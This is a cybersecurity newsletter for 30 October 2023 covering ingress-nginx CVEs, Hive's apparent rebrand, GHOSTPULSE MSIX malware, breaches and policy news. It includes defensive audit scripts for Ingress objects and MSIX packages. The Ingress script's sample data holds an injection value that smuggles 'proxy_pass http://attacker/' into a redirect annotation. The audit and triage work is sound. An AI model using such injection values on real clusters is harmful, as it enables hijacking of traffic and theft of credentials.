Cyber Briefing: 2023.10.30


👉 What's happening in cybersecurity today?

NGINX Ingress, Kubernetes, Hunters International, Hive Ransomware, GHOSTPULSE, MSIX, Windows 11, Microsoft 365, Victorville, California, Boeing, Lazarus, APT38, SIGNBT, North Korea, Kearny Bank, Stanford University, FTC, Gaza, Israel, CISA, Ukraine, Russia, White House, Logging.


 Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.





🚨 Cyber Alerts

1. NGINX Ingress Controller Vulnerabilities

Three high-severity vulnerabilities were disclosed by the Kubernetes security community, all in the widely used ingress-nginx controller. Tracked as CVE-2023-5043, CVE-2023-5044, and CVE-2022-4886, they let an attacker who can create or modify Ingress objects inject NGINX configuration (through the configuration-snippet and permanent-redirect annotations, and through insufficiently sanitized path values) and read files from the controller pod, including the service account token that gives the controller its high-privileged access to the Kubernetes API server. Because exploitation needs write access to Ingress objects, outsiders rarely have it directly, but the scenario is realistic in multi-tenant clusters and anywhere developers or CI/CD pipelines can push Ingress manifests.
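A cluster operator's first question is which existing Ingress objects already use the injection-prone annotations or unusual path values. The script below, added here as an example and not the Kubernetes project's own validator, walks Ingress objects in the shape `kubectl get ingress -A -o json` returns and flags raw-directive annotations, directive-breaking characters in interpolated annotations, and paths outside a conservative allow-list. The annotation names are the real ingress-nginx ones; the path allow-list is an assumption that is stricter than the controller's own rule, and the sample objects are constructed.

```python
"""Audit ingress-nginx Ingress objects for the annotation- and path-injection
patterns behind CVE-2023-5043, CVE-2023-5044 and CVE-2022-4886.

Added example for this briefing, not the Kubernetes project's validator;
the allow-lists below are a deliberately conservative assumption."""
from __future__ import annotations

import re

# Annotations that hand a tenant a raw nginx directive block (CVE-2023-5043 vector).
RAW_DIRECTIVE_ANNOTATIONS = {
    "nginx.ingress.kubernetes.io/configuration-snippet",
    "nginx.ingress.kubernetes.io/server-snippet",
    "nginx.ingress.kubernetes.io/stream-snippet",
    "nginx.ingress.kubernetes.io/auth-snippet",
}
# Annotations whose value is spliced into a single directive; a value that
# terminates the directive (';', newline, '}') smuggles in more config
# (CVE-2023-5044 vector).
INTERPOLATED_ANNOTATIONS = {
    "nginx.ingress.kubernetes.io/permanent-redirect",
    "nginx.ingress.kubernetes.io/temporal-redirect",
}
DIRECTIVE_BREAK = re.compile(r"[;\r\n{}\"'$]")
# Allow-list for spec.rules[].http.paths[].path.  Assumption: stricter than the
# controller's own rule, so it may flag odd-but-legal paths, but it will not
# pass the characters nginx cares about (';', braces, quotes, '$', whitespace).
SAFE_PATH = re.compile(r"^/[A-Za-z0-9._~%\-/:@+,=]*$")


def audit_ingress(ingress: dict) -> list[str]:
    """Return human-readable findings for one Ingress object (empty if clean)."""
    findings: list[str] = []
    meta = ingress.get("metadata", {})
    ref = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
    for key, value in meta.get("annotations", {}).items():
        if key in RAW_DIRECTIVE_ANNOTATIONS:
            findings.append(f"{ref}: raw nginx directives via {key}")
        elif key in INTERPOLATED_ANNOTATIONS and DIRECTIVE_BREAK.search(str(value)):
            findings.append(f"{ref}: directive-breaking characters in {key}")
    for rule in ingress.get("spec", {}).get("rules", []):
        for entry in rule.get("http", {}).get("paths", []):
            path = entry.get("path", "/")
            if not SAFE_PATH.match(path):
                findings.append(f"{ref}: suspicious path {path!r}")
    return findings


def audit_all(ingresses: list[dict]) -> list[str]:
    """Flat list of findings across every object (the .items[] of a kubectl dump)."""
    out: list[str] = []
    for ingress in ingresses:
        out.extend(audit_ingress(ingress))
    return out


# Constructed sample objects in the shape of `kubectl get ingress -A -o json`
# .items[]; not taken from any real cluster.
SAMPLE_INGRESSES = [
    {
        "metadata": {"name": "shop", "namespace": "tenant-a",
                     "annotations": {"nginx.ingress.kubernetes.io/rewrite-target": "/"}},
        "spec": {"rules": [{"http": {"paths": [{"path": "/shop", "pathType": "Prefix"}]}}]},
    },
    {
        "metadata": {"name": "evil", "namespace": "tenant-b",
                     "annotations": {
                         "nginx.ingress.kubernetes.io/configuration-snippet": "proxy_pass http://x;",
                         "nginx.ingress.kubernetes.io/permanent-redirect":
                             "http://example.org/;\nproxy_pass http://attacker/",
                     }},
        "spec": {"rules": [{"http": {"paths": [{"path": "/a;{", "pathType": "Prefix"}]}}]},
    },
]

if __name__ == "__main__":
    for line in audit_all(SAMPLE_INGRESSES):
        print(line)
```

To run it against a live cluster, feed `kubectl get ingress -A -o json` to `json.load` and pass its `items` to `audit_all`. The scan is a detection aid, not the fix: the controller's own mitigation is to upgrade to a release that validates annotations (the `--enable-annotation-validation` flag) and to run with `--strict-validate-path-type`, and in multi-tenant clusters to stop tenants from setting snippet annotations at all.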


2. Potential Hive Ransomware Rebrand

A new ransomware operation called Hunters International has surfaced and appears to be a rebrand of the Hive ransomware. Researchers found substantial code overlap between the two groups' encryptors, pointing to a connection. Hunters International says it bought the source code from Hive's developers rather than being the same crew, and states that its emphasis is on stealing data for extortion rather than on encryption; neither claim has dispelled suspicion of a direct lineage.


3. Windows PCs Targeted by GHOSTPULSE

A recently discovered campaign uses MSIX Windows app package files to distribute the GHOSTPULSE malware to Windows systems. MSIX is Microsoft's format for packaging and distributing Windows applications; a package must be signed before Windows will install it, so running this campaign required access to code signing certificates, which points to a well-resourced group. The operators lure victims into downloading the malicious MSIX packages through various techniques, and the package then delivers GHOSTPULSE through a multi-stage loading process.
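Because an MSIX package is a ZIP container with an XML manifest, a responder can triage a suspicious package without installing it. The script below, added here as an example and not Elastic's or Microsoft's tooling, reads the package identity, checks whether a signature blob is present, and lists anything that would run a script at launch. The package it inspects is constructed in memory, and the Package Support Framework (PSF) config.json layout it reads is an assumption about one common way a repackaged installer runs a script.

```python
"""Static triage of an MSIX package: identity, presence of a signature blob,
and anything that would run a script at launch.

Added example for this briefing; it is not Elastic's tooling.  The package
it inspects is built in memory below, and the Package Support Framework
(PSF) config.json layout it reads is an assumption about one common way an
MSIX launches a script."""
from __future__ import annotations

import io
import json
import zipfile
import xml.etree.ElementTree as ET

APPX_NS = "{http://schemas.microsoft.com/appx/manifest/foundation/windows10}"
SCRIPT_SUFFIXES = (".ps1", ".bat", ".cmd", ".vbs", ".js")


def triage_msix(blob: bytes) -> dict:
    """Inspect an MSIX (a ZIP container) without installing it."""
    report: dict = {"name": None, "publisher": None, "signed": False,
                    "executables": [], "scripts": [], "psf_start_script": None,
                    "findings": []}
    with zipfile.ZipFile(io.BytesIO(blob)) as pkg:
        names = pkg.namelist()
        # A signed package carries AppxSignature.p7x.  Presence is not validity:
        # the chain must still be checked on Windows (see usage note).
        report["signed"] = "AppxSignature.p7x" in names
        root = ET.fromstring(pkg.read("AppxManifest.xml"))
        identity = root.find(APPX_NS + "Identity")
        if identity is not None:
            report["name"] = identity.get("Name")
            report["publisher"] = identity.get("Publisher")
        for app in root.iter(APPX_NS + "Application"):
            if app.get("Executable"):
                report["executables"].append(app.get("Executable"))
        report["scripts"] = [n for n in names if n.lower().endswith(SCRIPT_SUFFIXES)]
        if "config.json" in names:  # assumed PSF layout: applications[].startScript.scriptPath
            cfg = json.loads(pkg.read("config.json"))
            for app in cfg.get("applications", []):
                script = app.get("startScript", {}).get("scriptPath")
                if script:
                    report["psf_start_script"] = script
    if not report["signed"]:
        report["findings"].append("unsigned: no AppxSignature.p7x in package")
    if any(e.lower().startswith("psflauncher") for e in report["executables"]):
        report["findings"].append("entry point is the PSF launcher, not the application")
    if report["psf_start_script"]:
        report["findings"].append(f"PSF startScript runs {report['psf_start_script']} at launch")
    if report["scripts"]:
        report["findings"].append("script files bundled: " + ", ".join(report["scripts"]))
    return report


def build_sample_package(signed: bool = False) -> bytes:
    """Constructed stand-in for a PSF-wrapped installer; not a real sample."""
    manifest = (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10">'
        '<Identity Name="Contoso.Sample" Publisher="CN=Contoso" Version="1.0.0.0"/>'
        '<Applications><Application Id="App" Executable="PsfLauncher64.exe" '
        'EntryPoint="Windows.FullTrustApplication"/></Applications></Package>'
    )
    config = {"applications": [{"id": "App", "executable": "VFS/sample.exe",
              "startScript": {"scriptPath": "StartingScriptWrapper.ps1",
                              "scriptArguments": "-ExecutionPolicy Bypass"}}]}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("AppxManifest.xml", manifest)
        pkg.writestr("config.json", json.dumps(config))
        pkg.writestr("StartingScriptWrapper.ps1", "# stand-in script body")
        if signed:
            pkg.writestr("AppxSignature.p7x", b"\x30\x00")  # placeholder, not a real PKCS#7 blob
    return buf.getvalue()


if __name__ == "__main__":
    for line in triage_msix(build_sample_package())["findings"]:
        print(line)
```

The script only reports that a signature blob exists; whether the signer is who the `Publisher` attribute claims, and whether that certificate is one the organisation trusts, has to be checked on Windows with `Get-AuthenticodeSignature` against the `.msix` file. A legitimate-looking publisher string combined with a PSF launcher and a start script is the shape a repackaged installer takes, and is worth a closer look before anyone double-clicks it.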


4. Windows 11 Adds More Archive Formats

Microsoft has extended Windows 11's built-in archive support with 11 additional formats, including RAR, 7-Zip, Tar, and GZ archives. The support ships with the optional KB5031455 Preview cumulative update; password-protected archives are not yet handled. Microsoft built the feature on the open-source libarchive project and may add further formats later, such as LZH and XAR. For defenders the practical change is that Explorer now parses these formats from untrusted downloads natively, so libarchive's parsers become part of the operating system's attack surface rather than a third-party tool's.


5. Workaround for Office 365 Sign-In Error

Microsoft has released a workaround for a widespread issue in which Microsoft 365 users hit 'Something Went Wrong [1001]' errors when signing in to desktop applications, leaving Excel, Word, Outlook, and PowerPoint unusable for many customers. The problem affects Microsoft 365 Apps for business, Microsoft 365, and the Office apps for iOS and Android.



💥 Cyber Incidents


6. California City Ransomware Attack Warning

In Victorville, California, residents were warned about a data breach following a ransomware attack that exposed sensitive information. City officials disclosed that hackers had access to their systems from August 12 to September 26, and the breached data included names, Social Security numbers, driver's license information, medical records, and health insurance policy numbers. While the city has restored some services affected by the attack, web-based systems remain non-functional.


7. Boeing Faces Ransomware Attack

The LockBit ransomware gang has named the aerospace and defense contractor Boeing as its latest victim. The Russian-speaking group posted the claim on its dark web leak site, asserting that it holds a large trove of sensitive data and that everything will be published unless Boeing opens negotiations before November 2nd, 1:23 pm UTC. The gang's listing values Boeing and its subsidiaries at around $60 billion, and a leak of that scale would be a significant blow to a leader in aviation and space technology.


8. Lazarus Targets Software Vendor

A Kaspersky report describes the North Korean Lazarus group repeatedly breaching the same software vendor, apparently to steal source code or stage a supply chain attack. Between March and August 2023 the attackers kept exploiting software vulnerabilities to get back in even after multiple patches and warnings had been issued. They deployed the SIGNBT backdoor together with LPEClient, a loader and information stealer. The repeated re-entry is the lesson: remediation has to include verifying that patches were actually applied and watching for the same actor returning through the same door.


9. Kearny Bank's Data Breach Disclosure

Kearny Bank, based in New Jersey, disclosed a data breach where credit card numbers and other sensitive client information were exposed due to the MOVEit Transfer attacks. The breach was linked to a zero-day vulnerability exploit affecting Fiserv, a third-party vendor providing financial technology services to the bank. While the bank reassured that its in-house systems were secure, over 17,000 clients were affected, prompting Kearny Bank to provide affected individuals with free credit monitoring, fraud consultation, and identity restoration services for 24 months.


10. Stanford University Cyber Threat

After a ransomware gang claimed an attack on Stanford University, the institution confirmed it is investigating a cybersecurity incident within its Department of Public Safety, working with outside specialists to determine the extent of the impact. The Akira ransomware gang, which has hit a number of U.S. colleges and K-12 schools this year, claimed responsibility and says it stole 430 gigabytes of data.



📢 Cyber News

11. Biden's AI Security Executive Order

The White House is set to issue a sweeping executive order on securing the development of advanced artificial intelligence models. President Joe Biden is invoking the Defense Production Act, a Cold War-era authority over private industry, to require developers of the most capable AI models to notify the government and share the results of their safety tests. The order aims to ensure that generative AI foundation models that could pose risks to national security or public health are rigorously tested against new safety standards before release.


12. FTC Expands Data Breach Reporting

The Federal Trade Commission (FTC) is broadening financial data breach reporting requirements to cover non-banking institutions such as mortgage brokers, auto dealers, and payday lenders. Under the amended Safeguards Rule, these entities must notify the FTC, no later than 30 days after discovery, when unencrypted records of at least 500 consumers are acquired without authorization. The amendment takes effect in six months and is intended to strengthen consumer data protection by forcing timely disclosure.


13. Internet Disruption in Gaza

Amid Israel's military expansion of its ground operation in Gaza, the region has experienced a severe limitation in internet access, with widespread outages affecting cellular, internet, and other communication services. The Palestine Telecommunications Company, known as Paltel, attributed the outages to the destruction of its infrastructure caused by intense bombing. Internet monitoring organizations have reported that these disruptions mark one of the most significant internet blackouts in Gaza, impacting residents' ability to communicate with the outside world, coordinate evacuations, and access critical emergency services, raising concerns about public safety and healthcare operations.


14. IT Army Launches DDoS Attacks in Ukraine

Ukrainian hackers, known as the IT Army, conducted a distributed denial-of-service (DDoS) attack that disrupted internet services provided by three Russian operators in territories occupied by Russia. The attack impacted cellular networks, phone services, and internet connectivity. This action is part of a broader strategy by Ukraine to hinder enemy military communication in the occupied regions, demonstrating the ongoing cyber conflict in the area.


15. CISA Launches Logging Made Easy

The Cybersecurity and Infrastructure Security Agency (CISA) has released a new version of Logging Made Easy (LME), a free, turnkey log management solution for Windows-based devices. LME originated as a project of the United Kingdom's National Cyber Security Centre (NCSC), whose original version has since been decommissioned; CISA's release builds on it and is aimed at organizations with limited resources that otherwise would not centralize their Windows logs. CISA encourages both public and private entities to deploy it to improve visibility into their Windows-based devices.




Copyright © 2023 CyberMaterial. All Rights Reserved.

Follow CyberMaterial on:

LinkedIn, Twitter, Reddit, Instagram, Facebook, YouTube, and Medium.



